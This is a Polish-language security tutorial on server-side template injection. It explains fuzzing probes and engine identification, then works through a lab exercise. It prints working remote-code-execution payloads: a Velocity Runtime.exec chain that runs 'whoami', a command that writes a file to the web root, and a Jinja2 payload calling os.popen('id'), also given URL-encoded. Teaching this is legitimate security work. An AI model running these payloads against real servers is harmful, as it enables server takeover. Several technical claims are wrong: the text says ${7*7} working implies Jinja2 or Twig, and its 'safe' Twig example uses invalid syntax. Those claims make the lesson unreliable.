# Server-side Template Injection
Atak typu Server-side Template Injection czyli wstrzykiwanie szablonów po stronie serwera jest dużo groźniejszy i dosyć podobny do ataku omawianego w kursie podstawowym, czyli Client-Side Template Injection.
Przyjrzyjmy się może najpierw nazwom. Oba ataki już na pierwszy rzut oka różnią się słowem client-side i server-side.
Pierwszy z ataków jest wykonywany po stronie klienta więc nie jest on, aż tak groźny jak jego odpowiednik po stronie serwera. Jednakże, tak czy inaczej nawet ataki po stronie klienta mogą być groźne, szczególnie dla innych użytkowników. Wstrzyknięcie szablonów po stronie serwera może doprowadzić nawet do kontroli nad całym serwerem ze względu na to, że kod wykonywanych szablonów działa po stronie serwera.
Oczywiście ataki tego typu wykorzystują najczęściej zaufanie programisty do danych od użytkownika. Poza tym ze względu na złożoność bibliotek korzystających z szablonów oraz języków często zdarza się, że uniknięcie tego ataku jest bardzo ciężkie.
Najczęściej atakujący wykorzystuje określone funkcje i klasy, żeby następnie dzięki nim wykorzystać kolejne i kolejne, aż znajdzie metodę dzięki której może np. przejąć kontrolę nad serwerem.
Załatanie tego typu błędów jest bardzo trudne.

Twórcy stron, którzy używają wąskiego spektrum narzędzi wraz z silnikiem szablonów raczej nie mają się czego martwić, o ile odpowiednio filtrują dane. Natomiast, twórcy większych stron mogą mieć istotne powody do obaw, ponieważ mnogość różnych metod pojawiających się w ramach np. różnego rodzaju pluginów często dostarcza też wiele możliwości ataku.

## SSTI (Server-side Template Injection) - przebieg ataku
SSTI występuje najczęściej wtedy kiedy poziom zabezpieczeń jest za niski lub dane od użytkowników są uważane za zaufane. Poniżej zaprezentuję dwa sposoby użycia szablonów. Jeden dobry, drugi zły:
Zacznę od tego złego:
```php
$output = $twig->render("Hello " . $_GET['name']);
```
A teraz dobry:
```php
$output = $twig->render("Hello {name}");
```
Na pierwszy rzut oka widać pewną różnicę. W pierwszym przypadku do pobrania informacji o użytkowniku używa się parametru GET, który jest kontrolowany przez użytkownika. Dodatkowo po jego użyciu nie ma żadnej funkcji, która filtrowałaby dane. W tym przypadku najpewniej można byłoby wykorzystać wstrzyknięcie w silnik szablonów i próbować używać funkcji systemowych. Można byłoby pokusić się o sprawdzenie czy przypadkiem nie jest możliwe skorzystanie z podatności XSS.
Drugi kod trochę różni się od poprzedniego, ponieważ po pierwsze nie pobiera bezpośrednio informacji od użytkownika, ale to nie gra istotnej roli. Najważniejszą sprawą jest to, że tutaj znaczniki kodu już są, a sam silnik szablonów korzysta ze swoich funkcji, które w domyśle starają się odfiltrować pewne dane. Takie użycie szablonu jest już znacznie bezpieczniejsze, ale nie zawsze gwarantuje pełne bezpieczeństwo.

## SSTI - Fuzzing
Rzadko kiedy będziemy mieli dostęp do kodu aplikacji więc testowanie oraz wykrywanie podatnych pól na SSTI jest znacznie trudniejsze. W tym celu używa się najczęściej fuzzerów, które wrzucają różne dane do pól w aplikacji. W przypadku silników szablonów mogą być to dane, które wywołują błąd składni jak np. "{}'" i inne.
Najczęściej błędy, które wtedy są wyrzucane zdradzają dużo informacji, zazwyczaj na tyle, żeby określić z jakim parametrem mamy do czynienia. W Internecie powstała nawet specjalna tabelka z różnymi sposobami wstrzykiwania danych do silników szablonów. W zależności od tego jakie wyniki daje wstrzyknięcie można z dużą precyzją określić z jakiego silnika szablonów korzysta aplikacja.
```sh
https://dmeg.tech/2020/12/24/Finding%20and%20performing%20SSTI/
```

Atak lub test penetracyjny na podatność SSTI, zazwyczaj zaczyna się od prostych wstrzyknięć typu:
```twig
{{7*7}}
${7*7}
```
Dzięki temu można ocenić z jaką składnią mamy do czynienia, a to już przybliża nas do poznania silnika szablonów. Oczywiście wynikiem tego poniżej powinna być liczba 49, a nie treść z klamrami.
W dużej części przypadków dosyć łatwo określić silnik szablonów patrząc z jakiego języka korzysta aplikacja. Najpopularniejsze silniki szablonów korzystają z pewnych języków programowania, które są nierozłączne z silnikami szablonów. Także możliwości jest naprawdę wiele.
Największą trudnością jest późniejsze wykorzystanie silnika szablonów tak, żeby wykorzystać jego funkcje do wykonania poleceń po stronie serwera.

## Silniki Szablonów: Apache FreeMarker i Velocity, PHP Twig
Tak jak w tytule postaram się omówić najbardziej popularne silniki szablonów, bo każdy z nich ma trochę inną składnię i inne wykorzystanie w celach przejęcia kontroli. Dodatkowo zdecydowana część innych silników szablonów korzysta ze składni tych głównych, co dodatkowo pozwoli ułatwić pracę z innymi silnikami oraz pozwoli na przeanalizowanie najczęstszych tj. najpopularniejszych ataków.
 - [__Apache FreeMarker__](https://freemarker.apache.org/) jest silnikiem wykorzystującym Java. Jego składnia zbudowana jest ze znaku dolara i klamr np. `${code}`
 - [__Velocity__](https://velocity.apache.org/) korzysta ze specjalnego języka VTL (Velocity Template Language). Jego cechą charakterystyczną jest korzystanie ze znaku dolarów i hasha: `$`, `#`. Najczęściej w celach uzyskania kontroli nad serwerem korzysta z różnych klas języka Java, żeby na koniec skorzystać z klasy RunTime.
 - [__PHP Twig__](https://twig.symfony.com/) korzysta ze składni dwóch klamr `{}`

## Opracowanie ataku po wykryciu silnika szablonów
W toku identyfikacji korzystając z fuzzera wykryliśmy, że silnik szablonów jest szczególnie wrażliwy na znaki `#` oraz `$`. Najprawdopobniej silnikiem jest Velocity.
Dodatkowo starając się sprawdzić czy na pewno mamy do czynienia z tym silnikiem skorzystaliśmy z prostej składni
```java
#set ($run = 1 + 1) $run
```
która jako wynik podała nam 2. Ten kod jest dosyć prosty. Oznacza wykonanie kodu w nawiasach, który przypisze się do zmiennej run, a następnie ta zmienna jest wyświetlana.
Mając pewność, że mamy do czynienia z tym silnikiem można spróbować skorzystać z działań grubszego kalibru i podjąć próbę wykonania kodu na serwerze.
```java
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
```
W pierwszej kolejność korzystamy ze zmiennej, która pozwala nam dostać się i skorzystać z różnych klas takich jak String, Character czy Runtime. Następnie z takiej klasy korzysta się z funkcji getRuntime() która tworzy obiekt, a z obiektu wywołuje się metodę exec, która wykonuje polecenie `whoami`. Wynik działania zapisywany jest do zmiennej "$ex". Następne linie kodu pozwalają wyświetlić wynik tej zmiennej. 
Warto wspomnieć, że funkcja waitFor() czeka na wykonanie procesu.

Chociaż jeżeli nie potrzebowalibyśmy dostać wyników, a jedynie chcielibyśmy stworzyć plik w webroot, można byłoby się pokusić o usunięcie prawie całego kodu. Tak jak poniżej:
```java
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("echo 'test' > /var/www/html/test"))
```
Jak widać w przypadku użycia Velocity na podatnej stronie kluczową cechą pozwalającą nam wejść do systemu jest brak filtrowania danych oraz zbyt duża ilość klas, których można używać.
Analogicznie podobne ataki można przeprowadzić na innych silnikach szablonów.

Dla większości popularnych szablonów są już gotowe exploity zapewniające RCE o ile możliwe jest wstrzyknięcie danych. Część aplikacji dodatkowo filtruje klasy, ale najczęściej nie wszystkie przez co można szukać wektorów przez inne klasy tak, żeby na samym końcu wywołać niebezpieczne metody klas związanych z systemem.

## Ćwiczenie z SSTI
Ćwiczenie znajduje się pod adresem:
```sh
http://vuln.vms.perkmylife.com:81
```
Na początku widzimy tylko napis z imieniem "guest", za imię odpowiada parametr "name". Warto użyć fuzzera do sprawdzenia czy to jedyny parametr dostępny.

Najpierw musimy zidentyfikować miejsce wtrzyknięcia oraz silnik. 
Dobrym kandydatem będzie parametr "name", bo to jedyny, który obecnie znamy.

Spróbujmy wstrzykniecia dwóch najpopularniejszych składni:
```twig
{{7*7}}
${7*7}
```
Okazuje się, że ta druga składnia działa bardzo dobrze. Co sugeruje, że mamy do czynienia z silnikiem Python [Jinja2](https://pypi.org/project/Jinja2/), PHP [Twig](https://twig.symfony.com/) lub innym mniej znanym.

Spróbujmy jednego z exploitów dla Jinja2
```twig
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
```
Zanim tak sformułowany payload przekaże się do bazy danych warto skorzystać z URLencode, tak żeby nie zepsuć składni URL.
```
?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%0A%20%20%7B%25%20endif%20%25%7D%0A%0A%20%20%7B%25%20endfor%20%25%7D%0A%0A%7B%25%20endif%20%25%7D%0A%0A%7B%25%20endfor%20%25%7D
```

Teraz powinniśmy zobaczyć nazwę użytkownika, który jest na serwerze czyli dowód na możliwość wykonywania kodu na serwerze.